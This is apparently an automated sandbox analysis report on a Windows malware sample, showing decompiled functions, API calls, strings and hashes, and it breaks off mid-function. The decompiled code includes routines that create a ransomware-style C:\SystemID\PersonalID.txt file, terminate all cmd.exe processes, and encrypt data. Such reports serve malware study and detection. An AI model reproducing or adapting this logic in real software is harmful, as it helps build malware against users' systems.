0x0040c9e2
0x0040c9e6
0x0040c9e7
0x0040c9e8
0x0040c9ed
0x0040c9ee
0x0040c9f3
0x0040c9f8
0x0040c9f9
0x0040c9fe
0x0040ca01
0x0040ca03
0x0040ca43
0x0040ca47
0x0040ca4c
0x0040ca51
0x0040ca59
0x0040ca64
0x0040ca64
0x0040ca05
0x0040ca07
0x0040ca09
0x0040ca3a
0x0040ca3b
0x0040ca40
0x00000000
0x0040ca40
0x0040ca10
0x0040ca10
0x0040ca14
0x0040ca18
0x0040ca1d
0x0040ca1d
0x0040ca22
0x0040ca29
0x0040ca30
0x0040ca33
0x0040ca36
0x0040ca36
0x00000000
0x0040ca10
0x0040c9b5
0x0040c9b8
0x0040c9b8
0x0040c9bc
0x0040c9c2
0x0040c9be
0x0040c9be
0x0040c9be
0x0040c9c4
0x0040c9c5
0x0040c9c6
0x0040c9cb
0x0040c9ce
0x0040c9d1
0x0040c9d1
0x0040c9d5
0x00000000
0x0040c9d5
0x0040c96a
0x0040c96c
0x00000000
0x00000000
0x0040c972
0x0040c976
0x00000000
0x00000000
0x0040c980
0x0040c984
0x0040c988
0x0040c98d
0x0040c98d
0x0040c992
0x0040c999
0x0040c9a0
0x0040c9a3
0x0040c9a6
0x00000000
0x0040c9aa
0x0040c920
0x0040c92c
0x0040c933
0x0040c93b
0x00000000
0x00000000
0x0040c93d
0x0040c942
0x00000000
0x00000000
0x00000000
0x0040c942
0x00000000
0x0040c920
0x0040c799
0x0040c79e
0x0040c7a1
0x0040c7a3
0x0040c906
0x0040c906
0x0040c909
0x0040c90e
0x00000000
0x0040c7b0
0x0040c7b0
0x0040c7b0
0x0040c7b9
0x0040c7bb
0x0040c7bc
0x0040c7c1
0x0040c7c6
0x00000000
0x00000000
0x0040c7ce
0x0040c7d5
0x0040c7dc
0x0040c7e7
0x0040c7ed
0x0040c7f3
0x0040c7f6
0x0040c7f6
0x0040c7f9
0x0040c7fc
0x0040c7fc
0x0040c801
0x0040c801
0x0040c803
0x00000000
0x0040c7e9
0x0040c7e9
0x0040c805
0x0040c805
0x0040c80d
0x0040c810
0x0040c815
0x0040c818
0x0040c81e
0x0040c861
0x0040c863
0x0040c869
0x0040c86e
0x0040c871
0x0040c871
0x0040c874
0x0040c876
0x0040c87a
0x0040c881
0x0040c888
0x0040c88b
0x0040c88f
0x0040c8ac
0x0040c8ae
0x0040c891
0x0040c894
0x0040c894
0x0040c895
0x0040c89f
0x0040c8a4
0x0040c8a4
0x0040c895
0x0040c8b8
0x0040c8be
0x0040c8c1
0x0040c8c3
0x0040c8ca
0x0040c8d1
0x0040c8d1
0x0040c824
0x0040c82b
0x0040c82f
0x0040c837
0x0040c83c
0x0040c842
0x0040c847
0x0040c84a
0x0040c84a
0x0040c850
0x0040c855
0x0040c85a
0x0040c85a
0x0040c855
0x0040c8d5
0x0040c8d8
0x0040c8e0
0x0040c8e3
0x0040c8e8
0x0040c8ed
0x0040c8ed
0x0040c8f0
0x0040c8f0
0x0040c8f3
0x0040c8f6
0x0040c8fb
0x0040c8fe
0x0040c8fe
0x00000000
0x0040c7b0

APIs

Part of subcall function 00420FDD: __wfsopen.LIBCMT ref: 00420FE8

_fgetws.LIBCMT ref: 0040C7BC
_memmove.LIBCMT ref: 0040C89F
CreateDirectoryW.KERNEL32(C:\SystemID,00000000), ref: 0040C94B

Strings

C:\SystemID\PersonalID.txt, xrefs: 0040C77C, 0040C956
C:\SystemID, xrefs: 0040C946

Memory Dump Source

Source File: 00000006.00000002.634364468.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.634364468.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.634364468.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_E640.jbxd

Yara matches

Similarity

API ID: CreateDirectory__wfsopen_fgetws_memmove
String ID: C:\SystemID$C:\SystemID\PersonalID.txt
API String ID: 2864494435-54166481
Opcode ID: 2687d2ae6b49c93f0c531133de6504eda4fe3c90c802da0d025506fda68fa67b
Instruction ID: 3a80d152ee3a33a632d987be3a831cd6f981e29f6d1810208bb328cacc5ceb60
Opcode Fuzzy Hash: 2687d2ae6b49c93f0c531133de6504eda4fe3c90c802da0d025506fda68fa67b
Instruction Fuzzy Hash: 449193B2E00219DBCF20DFA5D9857AFB7B5AF04304F54463BE805B3281E7799A44CB99

Uniqueness

Uniqueness Score: -1.00%

Function 00412440 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 52
processCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E00412440() {
				char _v524;
				long _v552;
				void* _v560;
				void* __ebx;
				void* __edi;
				void* __esi;
				int _t8;
				int _t11;
				void* _t17;
				void* _t18;
				void* _t19;
				void* _t21;

				_t18 = CreateToolhelp32Snapshot(0xf, 0);
				_v560 = 0x22c;
				_push( &_v560);
				_t8 = Process32FirstW(_t18);
				_t17 = CloseHandle;
				if(_t8 == 0) {
					L7:
					return CloseHandle(_t18);
				}
				_push(_t19);
				do {
					_t11 = E00420235(_t17, _t18, _t19,  &_v524, L"cmd.exe");
					_t21 = _t21 + 8;
					if(_t11 == 0) {
						_t19 = OpenProcess(1, _t11, _v552);
						if(_t19 != 0) {
							TerminateProcess(_t19, 9);
							CloseHandle(_t19);
						}
					}
				} while (Process32NextW(_t18,  &_v560) != 0);
				goto L7;
			}

0x00412455
0x00412457
0x00412467
0x00412469
0x0041246f
0x00412477
0x004124cc
0x004124d4
0x004124d4
0x00412479
0x00412480
0x0041248c
0x00412491
0x00412496
0x004124a7
0x004124ab
0x004124b0
0x004124b7
0x004124b7
0x004124ab
0x004124c7
0x00000000

APIs

CreateToolhelp32Snapshot.KERNEL32(0000000F,00000000), ref: 0041244F
Process32FirstW.KERNEL32(00000000,0000022C), ref: 00412469
OpenProcess.KERNEL32(00000001,00000000,?), ref: 004124A1
TerminateProcess.KERNEL32(00000000,00000009), ref: 004124B0
CloseHandle.KERNEL32(00000000), ref: 004124B7
Process32NextW.KERNEL32(00000000,0000022C), ref: 004124C1
CloseHandle.KERNEL32(00000000), ref: 004124CD

Strings

cmd.exe, xrefs: 00412486

Memory Dump Source

Source File: 00000006.00000002.634364468.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.634364468.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.634364468.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_E640.jbxd

Yara matches

Similarity

API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
String ID: cmd.exe
API String ID: 2696918072-723907552
Opcode ID: f800ed1a70d164d25c801f6619c0d912ca8855511ce51469826557765f8e188c
Instruction ID: b239e8364e8e77cb7af63d5752a1eab109cf3eb7ce5fcb3b526656d556a9da04
Opcode Fuzzy Hash: f800ed1a70d164d25c801f6619c0d912ca8855511ce51469826557765f8e188c
Instruction Fuzzy Hash: ED0192355012157BE7206BA1AC89FAF766CEB08714F0400A2FD08D2141EA6489408EB9

Uniqueness

Uniqueness Score: -1.00%

Function 0040F310 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 311
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E0040F310(void* __edi, void* __esi, char _a4, signed int _a20, intOrPtr _a24) {
				signed int _v8;
				intOrPtr _v16;
				char _v20;
				intOrPtr _v28;
				char _v32;
				intOrPtr _v36;
				signed int _v40;
				short _v56;
				intOrPtr _v60;
				signed int _v64;
				short _v80;
				intOrPtr _v84;
				signed int _v88;
				char _v104;
				void* __ebx;
				void* __ebp;
				_Unknown_base(*)()* _t147;
				void* _t169;
				void* _t173;
				void* _t177;
				void* _t195;
				void* _t203;
				struct HINSTANCE__* _t221;
				signed int _t222;
				void* _t233;
				void* _t235;
				signed int _t238;
				short _t260;
				char _t261;
				intOrPtr _t266;
				void* _t267;
				void* _t268;
				void* _t269;

				_push(0xffffffff);
				_push(0x4caa98);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t266;
				_t267 = _t266 - 0x58;
				_v8 = 0;
				_t221 = LoadLibraryW(L"Shell32.dll");
				if(_t221 != 0) {
					_t147 = GetProcAddress(_t221, "SHGetFolderPathW");
					_t259 = _t147;
					E00413A90(_t221,  &_v32, __edi, 0x400);
					_v8 = 1;
					_t254 = _v32;
					 *_t147(0, 0x28, 0, 0, _v32, __edi, __esi);
					_push(_v20);
					_v36 = 7;
					_v40 = 0;
					_v56 = 0;
					E00418400( &_v56, _v32, _v28);
					_v8 = 2;
					_push(1);
					_v84 = 7;
					_v88 = 0;
					_v104 = 0;
					E00415C10(_t221,  &_v104, _t254, _t147, "\\");
					_v8 = 3;
					_push(1);
					_v60 = 7;
					_v64 = 0;
					_v80 = 0;
					E00415C10(_t221,  &_v80, _t254, _t147, "/");
					_v8 = 4;
					E0040F2B0( &_v56,  &_v80,  &_v104);
					_t268 = _t267 + 4;
					if(_v60 >= 8) {
						L00422587(_v80);
						_t268 = _t268 + 4;
					}
					_v8 = 2;
					_v60 = 7;
					_v64 = 0;
					_v80 = 0;
					if(_v84 >= 8) {
						L00422587(_v104);
						_t268 = _t268 + 4;
					}
					_push(1);
					_v84 = 7;
					_v88 = 0;
					_v104 = 0;
					E00415C10(_t221,  &_v104, _t254, _t259, "\\");
					_v8 = 5;
					_push(1);
					_v60 = 7;
					_v64 = 0;
					_v80 = 0;
					E00415C10(_t221,  &_v80, _t254, _t259, "/");
					_v8 = 6;
					E0040F2B0( &_a4,  &_v80,  &_v104);
					_t269 = _t268 + 4;
					if(_v60 >= 8) {
						L00422587(_v80);
						_t269 = _t269 + 4;
					}
					_v8 = 2;
					_v60 = 7;
					_v64 = 0;
					_v80 = 0;
					if(_v84 >= 8) {
						L00422587(_v104);
						_t269 = _t269 + 4;
					}
					_t260 = _v56;
					_t167 =  >=  ? _t260 :  &_v56;
					_t233 =  >=  ? _t260 :  &_v56;
					_v20 =  >=  ? _t260 :  &_v56;
					_t250 =  >=  ? _t260 :  &_v56;
					_t169 = _t233 + _v40 * 2;
					__eflags = ( >=  ? _t260 :  &_v56) - _t169;
					if(( >=  ? _t260 :  &_v56) != _t169) {
						_push(_t233);
						E00418380( &_v20, _t250, _t169, _v20);
						_t269 = _t269 + 0xc;
					}
					_t261 = _a4;
					_t171 =  >=  ? _t261 :  &_a4;
					_t235 =  >=  ? _t261 :  &_a4;
					_v20 =  >=  ? _t261 :  &_a4;
					_t252 =  >=  ? _t261 :  &_a4;
					_t173 = _t235 + _a20 * 2;
					__eflags = ( >=  ? _t261 :  &_a4) - _t173;
					if(( >=  ? _t261 :  &_a4) != _t173) {
						_push(_t235);
						E00418380( &_v20, _t252, _t173, _v20);
						_t269 = _t269 + 0xc;
					}
					_t267 = _t269 - 8;
					_v20 = 0x5c;
					if(E00414D40( &_v56,  &_v20) != 0xffffffff) {
						_t177 = E00413520( &_v56,  &_v104, 0, _t175);
						_t262 = _t177;
						if( &_v56 != _t177) {
							if(_v36 >= 8) {
								L00422587(_v56);
								_t267 = _t267 + 4;
							}
							_v36 = 7;
							_v40 = 0;
							_v56 = 0;
							E004145A0( &_v56, _t262);
						}
						if(_v84 >= 8) {
							L00422587(_v104);
							_t267 = _t267 + 4;
						}
						_t238 = _v40;
						_t180 =  >=  ? _v56 :  &_v56;
						if( *((short*)(( >=  ? _v56 :  &_v56) + _t238 * 2 - 2)) == 0x5c) {
							_t97 = _t238 - 1; // -1
							_t203 = E00413520( &_v56,  &_v104, 0, _t97);
							_t265 = _t203;
							if( &_v56 != _t203) {
								if(_v36 >= 8) {
									L00422587(_v56);
									_t267 = _t267 + 4;
								}
								_v36 = 7;
								_v40 = 0;
								_v56 = 0;
								E004145A0( &_v56, _t265);
							}
							if(_v84 >= 8) {
								L00422587(_v104);
								_t267 = _t267 + 4;
							}
						}
						_t239 = _a20;
						_t182 =  >=  ? _a4 :  &_a4;
						if( *((short*)(( >=  ? _a4 :  &_a4) + _a20 * 2 - 2)) == 0x5c) {
							_t239 =  &_a4;
							_t195 = E00413520( &_a4,  &_v104, 0,  &_a4 - 1);
							_t264 = _t195;
							if( &_a4 != _t195) {
								if(_a24 >= 8) {
									L00422587(_a4);
									_t267 = _t267 + 4;
								}
								_a24 = 7;
								_t239 =  &_a4;
								_a20 = 0;
								_a4 = 0;
								E004145A0( &_a4, _t264);
							}
							if(_v84 >= 8) {
								L00422587(_v104);
								_t267 = _t267 + 4;
							}
						}
						FreeLibrary(_t221);
						_t185 =  >=  ? _a4 :  &_a4;
						_t222 = _t221 & 0xffffff00 | E00417F00( &_v56, _t239, _v40,  >=  ? _a4 :  &_a4, _a20) == 0x00000000;
					} else {
						FreeLibrary(_t221);
						_t222 = 0;
					}
					if(_v36 >= 8) {
						L00422587(_v56);
						_t267 = _t267 + 4;
					}
					_v36 = 7;
					_v56 = 0;
					_t188 = _v32;
					_v40 = 0;
					if(_v32 != 0) {
						L00422587(_t188);
						_t267 = _t267 + 4;
					}
					goto L41;
				} else {
					_t222 = 0;
					L41:
					if(_a24 >= 8) {
						L00422587(_a4);
					}
					 *[fs:0x0] = _v16;
					return _t222;
				}
			}

0x0040f313
0x0040f315
0x0040f320
0x0040f321
0x0040f328
0x0040f331
0x0040f33e
0x0040f342
0x0040f353
0x0040f361
0x0040f363
0x0040f368
0x0040f36c
0x0040f378
0x0040f37a
0x0040f37f
0x0040f38c
0x0040f394
0x0040f398
0x0040f39d
0x0040f3a4
0x0040f3a8
0x0040f3b4
0x0040f3bb
0x0040f3bf
0x0040f3c4
0x0040f3cb
0x0040f3cf
0x0040f3db
0x0040f3e2
0x0040f3e6
0x0040f3ee
0x0040f3f9
0x0040f3fe
0x0040f405
0x0040f40a
0x0040f40f
0x0040f40f
0x0040f414
0x0040f41c
0x0040f423
0x0040f42a
0x0040f42e
0x0040f433
0x0040f438
0x0040f438
0x0040f43b
0x0040f43f
0x0040f44e
0x0040f455
0x0040f459
0x0040f45e
0x0040f465
0x0040f469
0x0040f475
0x0040f47c
0x0040f480
0x0040f488
0x0040f493
0x0040f498
0x0040f49f
0x0040f4a4
0x0040f4a9
0x0040f4a9
0x0040f4ae
0x0040f4b6
0x0040f4bd
0x0040f4c4
0x0040f4c8
0x0040f4cd
0x0040f4d2
0x0040f4d2
0x0040f4db
0x0040f4e7
0x0040f4ea
0x0040f4ed
0x0040f4f0
0x0040f4f6
0x0040f4f9
0x0040f4fb
0x0040f4fd
0x0040f505
0x0040f50a
0x0040f50a
0x0040f513
0x0040f51f
0x0040f522
0x0040f525
0x0040f528
0x0040f52e
0x0040f531
0x0040f533
0x0040f535
0x0040f53d
0x0040f542
0x0040f542
0x0040f545
0x0040f548
0x0040f55e
0x0040f578
0x0040f57d
0x0040f584
0x0040f58a
0x0040f58f
0x0040f594
0x0040f594
0x0040f599
0x0040f5a4
0x0040f5ab
0x0040f5af
0x0040f5af
0x0040f5b8
0x0040f5bd
0x0040f5c2
0x0040f5c2
0x0040f5cc
0x0040f5cf
0x0040f5d9
0x0040f5db
0x0040f5e8
0x0040f5ed
0x0040f5f4
0x0040f5fa
0x0040f5ff
0x0040f604
0x0040f604
0x0040f609
0x0040f614
0x0040f61b
0x0040f61f
0x0040f61f
0x0040f628
0x0040f62d
0x0040f632
0x0040f632
0x0040f628
0x0040f63c
0x0040f63f
0x0040f649
0x0040f655
0x0040f658
0x0040f65d
0x0040f664
0x0040f66a
0x0040f66f
0x0040f674
0x0040f674
0x0040f679
0x0040f681
0x0040f684
0x0040f68b
0x0040f68f
0x0040f68f
0x0040f698
0x0040f69d
0x0040f6a2
0x0040f6a2
0x0040f698
0x0040f6a6
0x0040f6b6
0x0040f6c9
0x0040f560
0x0040f561
0x0040f567
0x0040f567
0x0040f6d2
0x0040f6d7
0x0040f6dc
0x0040f6dc
0x0040f6e1
0x0040f6e8
0x0040f6ec
0x0040f6ef
0x0040f6f8
0x0040f6fb
0x0040f700
0x0040f700
0x00000000
0x0040f344
0x0040f344
0x0040f703
0x0040f707
0x0040f70c
0x0040f711
0x0040f71a
0x0040f724
0x0040f724

APIs

LoadLibraryW.KERNEL32(Shell32.dll), ref: 0040F338
GetProcAddress.KERNEL32(00000000,SHGetFolderPathW), ref: 0040F353

Strings

\, xrefs: 0040F548
Shell32.dll, xrefs: 0040F32C
SHGetFolderPathW, xrefs: 0040F34D

Memory Dump Source

Source File: 00000006.00000002.634364468.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.634364468.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.634364468.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_E640.jbxd

Yara matches

Similarity

API ID: AddressLibraryLoadProc
String ID: SHGetFolderPathW$Shell32.dll$\
API String ID: 2574300362-2555811374
Opcode ID: 802c4dd66a51af63dd6bd345fe50592ac7cccf8316e7ed6c923d47920c69bc81
Instruction ID: 879cb2c41796572bb27552663435674e3d239ec9c812fe4031d18dca963833e9
Opcode Fuzzy Hash: 802c4dd66a51af63dd6bd345fe50592ac7cccf8316e7ed6c923d47920c69bc81
Instruction Fuzzy Hash: DFC15A70D00209EBDF10DFA4DD85BDEBBB5AF14308F10443AE405B7291EB79AA59CB99

Uniqueness

Uniqueness Score: -1.00%

Function 0040CBA0 Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 240
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E0040CBA0(intOrPtr* __ecx, void* __eflags, char _a4, char _a20, intOrPtr _a24, char _a28, intOrPtr _a48) {
				char _v8;
				intOrPtr _v16;
				char _v20;
				intOrPtr _v24;
				char _v28;
				char _v44;
				intOrPtr _v48;
				char _v52;
				char _v68;
				intOrPtr _v72;
				char _v76;
				char _v92;
				intOrPtr _v96;
				intOrPtr* _v100;
				char _v1124;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t127;
				intOrPtr _t129;
				void* _t150;
				void* _t172;
				void* _t173;
				void* _t176;
				void* _t178;
				intOrPtr _t179;
				void* _t181;
				void* _t182;
				void* _t183;
				void* _t185;
				void* _t189;
				void* _t191;

				_push(0xffffffff);
				_push(0x4ca818);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t179;
				_push(_t150);
				_push(_t172);
				_v100 = __ecx;
				_push(0xffffffff);
				_v8 = 1;
				_push(0);
				_v72 = 0xf;
				_v76 = 0;
				_v92 = 0;
				E00413FF0(_t150,  &_v92,  &_a28);
				_v8 = 2;
				_push(1);
				_v48 = 0xf;
				_v52 = 0;
				_v68 = 0;
				E004156D0(_t150,  &_v68, _t172, "\n");
				_v8 = 3;
				_push(3);
				_v24 = 0xf;
				_v28 = 0;
				_v44 = 0;
				E004156D0(_t150,  &_v44, _t172, "\\\\n");
				_v8 = 4;
				E0040F250( &_v92,  &_v44,  &_v68);
				_t181 = _t179 - 0x458 + 4;
				if(_v24 >= 0x10) {
					L00422587(_v44);
					_t181 = _t181 + 4;
				}
				_v8 = 2;
				_v24 = 0xf;
				_v28 = 0;
				_v44 = 0;
				if(_v48 >= 0x10) {
					L00422587(_v68);
					_t181 = _t181 + 4;
				}
				_push(1);
				_v48 = 0xf;
				_v52 = 0;
				_v68 = 0;
				E004156D0(_t150,  &_v68, _t172, " ");
				_v8 = 5;
				_push(6);
				_v24 = 0xf;
				_v28 = 0;
				_v44 = 0;
				E004156D0(_t150,  &_v44, _t172, "&#160;");
				_v8 = 6;
				E0040F250( &_v92,  &_v44,  &_v68);
				_t182 = _t181 + 4;
				if(_v24 >= 0x10) {
					L00422587(_v44);
					_t182 = _t182 + 4;
				}
				_v8 = 2;
				_v24 = 0xf;
				_v28 = 0;
				_v44 = 0;
				if(_v48 >= 0x10) {
					L00422587(_v68);
					_t182 = _t182 + 4;
				}
				_push(1);
				_v48 = 0xf;
				_v52 = 0;
				_v68 = 0;
				E004156D0(_t150,  &_v68, _t172, "/");
				_v8 = 7;
				_push(2);
				_v24 = 0xf;
				_v28 = 0;
				_v44 = 0;
				E004156D0(_t150,  &_v44, _t172, "\\/");
				_v8 = 8;
				_t171 =  &_v44;
				E0040F250( &_v92,  &_v44,  &_v68);
				_t183 = _t182 + 4;
				if(_v24 >= 0x10) {
					L00422587(_v44);
					_t183 = _t183 + 4;
				}
				_v24 = 0xf;
				_v28 = 0;
				_v44 = 0;
				if(_v48 >= 0x10) {
					L00422587(_v68);
					_t183 = _t183 + 4;
				}
				_v20 = E00451D30();
				E0044F960(_t150, _t171, E00452510());
				_t120 =  >=  ? _v92 :  &_v92;
				_t151 = E004524A0(_t178,  >=  ? _v92 :  &_v92, _v76);
				E00452ED0(_t121,  &_v20, 0, 0);
				_t185 = _t183 + 0x1c;
				if(E00450960(_t151, _t171, _v72 - 0x10) == 0) {
					_t176 = E00420C62(_t151, _t171, _t172, E004527A0(_t171, __eflags, _v20));
					_t127 = E00420C62(_t151, _t171, _t172, 0x82);
					__eflags = _a24 - 0x10;
					_t173 = _t127;
					_t165 =  >=  ? _a4 :  &_a4;
					_t129 = _a20 + 1;
					_push(4);
					_push(_v20);
					_push(_t176);
					_push( >=  ? _a4 :  &_a4);
					E004525F0(_t129);
					_t189 = _t185 + 0x20;
					_v96 = _t129;
					__eflags = _t129 - 0xffffffff;
					if(_t129 != 0xffffffff) {
						E0044F5E0(_t151);
						E00451A60(_t171, _t178, _v20);
						_t191 = _t189 + 8;
						 *_v100 = _v96;
					} else {
						E00451FB0(_t151, _t173);
						E00450670(E00450960(_t151, _t171, __eflags), _t173);
						_push(_t173);
						_push("Error encrypting message: %s\n");
						_push(E00420E4D() + 0x40);
						E00422408(_t151, _t173, _t176, __eflags);
						_t191 = _t189 + 0x14;
						_t176 = 0;
					}
				} else {
					E00450670(_t124,  &_v1124);
					_t191 = _t185 + 8;
					_t176 = 0;
				}
				if(_v72 >= 0x10) {
					L00422587(_v92);
					_t191 = _t191 + 4;
				}
				_v72 = 0xf;
				_v76 = 0;
				_v92 = 0;
				if(_a24 >= 0x10) {
					L00422587(_a4);
					_t191 = _t191 + 4;
				}
				_a24 = 0xf;
				_a20 = 0;
				_a4 = 0;
				if(_a48 >= 0x10) {
					L00422587(_a28);
				}
				 *[fs:0x0] = _v16;
				return _t176;
			}

0x0040cba3
0x0040cba5
0x0040cbb0
0x0040cbb1
0x0040cbbe
0x0040cbc0
0x0040cbc1
0x0040cbc4
0x0040cbc6
0x0040cbd0
0x0040cbd6
0x0040cbdd
0x0040cbe4
0x0040cbe8
0x0040cbed
0x0040cbf4
0x0040cbfb
0x0040cc02
0x0040cc09
0x0040cc0d
0x0040cc12
0x0040cc19
0x0040cc20
0x0040cc27
0x0040cc2e
0x0040cc32
0x0040cc3a
0x0040cc45
0x0040cc4a
0x0040cc51
0x0040cc56
0x0040cc5b
0x0040cc5b
0x0040cc5e
0x0040cc66
0x0040cc6d
0x0040cc74
0x0040cc78
0x0040cc7d
0x0040cc82
0x0040cc82
0x0040cc85
0x0040cc8f
0x0040cc96
0x0040cc9d
0x0040cca1
0x0040cca6
0x0040ccad
0x0040ccb4
0x0040ccbb
0x0040ccc2
0x0040ccc6
0x0040ccce
0x0040ccd9
0x0040ccde
0x0040cce5
0x0040ccea
0x0040ccef
0x0040ccef
0x0040ccf2
0x0040ccfa
0x0040cd01
0x0040cd08
0x0040cd0c
0x0040cd11
0x0040cd16
0x0040cd16
0x0040cd19
0x0040cd23
0x0040cd2a
0x0040cd31
0x0040cd35
0x0040cd3a
0x0040cd41
0x0040cd48
0x0040cd4f
0x0040cd56
0x0040cd5a
0x0040cd62
0x0040cd67
0x0040cd6d
0x0040cd72
0x0040cd79
0x0040cd7e
0x0040cd83
0x0040cd83
0x0040cd8a
0x0040cd91
0x0040cd98
0x0040cd9c
0x0040cda1
0x0040cda6
0x0040cda6
0x0040cdae
0x0040cdb7
0x0040cdc6
0x0040cdd5
0x0040cdde
0x0040cde3
0x0040cded
0x0040ce1a
0x0040ce21
0x0040ce2c
0x0040ce30
0x0040ce35
0x0040ce39
0x0040ce3a
0x0040ce3c
0x0040ce3f
0x0040ce40
0x0040ce42
0x0040ce47
0x0040ce4a
0x0040ce4d
0x0040ce50
0x0040ce82
0x0040ce8d
0x0040ce95
0x0040ce9b
0x0040ce52
0x0040ce52
0x0040ce5e
0x0040ce66
0x0040ce67
0x0040ce74
0x0040ce75
0x0040ce7a
0x0040ce7d
0x0040ce7d
0x0040cdef
0x0040cdf7
0x0040cdfc
0x0040cdff
0x0040cdff
0x0040cea1
0x0040cea6
0x0040ceab
0x0040ceab
0x0040ceb2
0x0040ceb9
0x0040cec0
0x0040cec4
0x0040cec9
0x0040cece
0x0040cece
0x0040ced5
0x0040cedc
0x0040cee3
0x0040cee7
0x0040ceec
0x0040cef1
0x0040cefb
0x0040cf06

APIs

__except_handler4.MSVCRT ref: 0040CDDE
_malloc.LIBCMT ref: 0040CE12
_malloc.LIBCMT ref: 0040CE21
_fprintf.LIBCMT ref: 0040CE75

Strings

 , xrefs: 0040CCAF
\\n, xrefs: 0040CC1B
Error encrypting message: %s, xrefs: 0040CE67

Memory Dump Source

Source File: 00000006.00000002.634364468.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.634364468.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.634364468.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_E640.jbxd

Yara matches

Similarity

API ID: _malloc$__except_handler4_fprintf
String ID:  $Error encrypting message: %s$\\n
API String ID: 1783060780-3771355929
Opcode ID: c54239f3ac3d03d8a8f33ba6c85a0f732906007df9e82cc9490c83330886b458
Instruction ID: bc568b6946d652cfd5b4c77746d66a5f57144f99ddafb1662d710ebef24806c3
Opcode Fuzzy Hash: c54239f3ac3d03d8a8f33ba6c85a0f732906007df9e82cc9490c83330886b458
Instruction Fuzzy Hash: 10A196B1C00249EBEF10EF95DD46BDEBB75AF10308F54052DE40576282D7BA5688CBAA

Uniqueness

Uniqueness Score: -1.00%

Function 00463350 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 148
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 96%

			E00463350(void* __ebx, void* __edx, void* __ebp, char _a4, intOrPtr* _a8) {
				void* __edi;
				intOrPtr _t12;
				void* _t13;
				char _t16;
				intOrPtr _t19;
				signed int _t22;
				char _t35;
				void* _t36;
				char* _t37;
				void* _t38;
				intOrPtr* _t39;
				intOrPtr* _t40;
				char* _t41;
				void* _t42;
				char* _t43;

				_t45 = __ebp;
				_t38 = __edx;
				_t34 = __ebx;
				_t40 = _a4;
				_t39 = _a8;
				 *_t39 = 0;
				if(_t40 == 0) {
					L26:
					return 1;
				} else {
					_t12 =  *_t40;
					if(_t12 == 0 || _t12 == 0xa) {
						goto L26;
					} else {
						_t13 = E00448190(_t40, "Proc-Type: ", 0xb);
						_t60 = _t13;
						if(_t13 == 0) {
							__eflags =  *((char*)(_t40 + 0xb)) - 0x34;
							if( *((char*)(_t40 + 0xb)) != 0x34) {
								goto L5;
							} else {
								__eflags =  *((char*)(_t40 + 0xc)) - 0x2c;
								if( *((char*)(_t40 + 0xc)) != 0x2c) {
									goto L5;
								} else {
									_t41 = _t40 + 0xd;
									__eflags = E00448190(_t41, "ENCRYPTED", 9);
									if(__eflags == 0) {
										_t16 =  *_t41;
										__eflags = _t16 - 0xa;
										if(_t16 == 0xa) {
											L13:
											__eflags =  *_t41;
											if(__eflags != 0) {
												_t42 = _t41 + 1;
												__eflags = E00448190(_t42, "DEK-Info: ", 0xa);
												if(__eflags == 0) {
													_t43 = _t42 + 0xa;
													__eflags = _t43;
													_t37 = _t43;
													_push(_t34);
													while(1) {
														_t35 =  *_t43;
														__eflags = _t35 - 0x41;
														if(_t35 < 0x41) {
															goto L20;
														}
														__eflags = _t35 - 0x5a;
														if(_t35 <= 0x5a) {
															L22:
															_t43 = _t43 + 1;
															continue;
														}
														L20:
														__eflags = _t35 - 0x2d;
														if(_t35 == 0x2d) {
															goto L22;
														}
														_t6 = _t35 - 0x30; // -48
														__eflags = _t6 - 9;
														if(_t6 <= 9) {
															goto L22;
														}
														 *_t43 = 0;
														_t19 = E0047ECD0(_t37);
														 *_t39 = _t19;
														 *_t43 = _t35;
														_a4 = _t43 + 1;
														_pop(_t36);
														__eflags = _t19;
														if(__eflags != 0) {
															_t22 = E00464360( &_a4, _t39 + 4,  *((intOrPtr*)(_t19 + 0xc)));
															asm("sbb eax, eax");
															return  ~( ~_t22);
														} else {
															E004512D0(_t36, _t38, _t39, _t45, __eflags, 9, 0x6b, 0x72, ".\\crypto\\pem\\pem_lib.c", 0x219);
															__eflags = 0;
															return 0;
														}
														goto L27;
													}
												} else {
													E004512D0(_t34, _t38, _t39, _t45, __eflags, 9, 0x6b, 0x69, ".\\crypto\\pem\\pem_lib.c", 0x200);
													__eflags = 0;
													return 0;
												}
											} else {
												goto L14;
											}
										} else {
											while(1) {
												__eflags = _t16;
												if(__eflags == 0) {
													break;
												}
												_t16 =  *((intOrPtr*)(_t41 + 1));
												_t41 = _t41 + 1;
												__eflags = _t16 - 0xa;
												if(_t16 != 0xa) {
													continue;
												} else {
													goto L13;
												}
												goto L27;
											}
											L14:
